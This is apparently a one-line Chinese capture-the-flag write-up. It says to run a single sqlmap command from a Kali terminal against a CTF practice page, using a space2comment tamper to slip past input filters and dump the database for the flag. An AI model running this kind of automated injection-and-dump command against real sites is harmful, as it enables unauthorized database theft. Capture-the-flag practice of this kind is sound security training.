直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment
拿到flag